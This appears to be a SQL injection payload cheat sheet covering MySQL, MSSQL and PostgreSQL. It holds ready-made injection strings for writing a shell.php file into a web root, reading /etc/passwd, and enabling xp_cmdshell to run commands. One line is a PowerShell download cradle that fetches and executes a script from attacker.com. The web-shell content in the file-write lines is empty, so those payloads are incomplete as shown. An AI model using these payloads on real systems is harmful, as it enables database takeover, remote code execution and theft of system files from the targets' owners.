# MySQL file write (INTO OUTFILE)
' UNION SELECT '' INTO OUTFILE '/var/www/html/shell.php'-- -

# MySQL load_file for reading
' UNION SELECT load_file('/etc/passwd')-- -

# MySQL UDF (User Defined Functions)
# Requires FILE privilege
# Upload malicious shared library

# MSSQL xp_cmdshell
'; EXEC xp_cmdshell 'whoami';--
'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE;--
'; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;--
'; EXEC xp_cmdshell 'powershell -c "IEX(New-Object Net.WebClient).DownloadString(''http://attacker.com/shell.ps1'')"';--

# PostgreSQL
# Copy to file
COPY (SELECT '') TO '/var/www/html/shell.php';

# Large object
SELECT lo_import('/etc/passwd');
SELECT lo_get(12345); -- oid from lo_import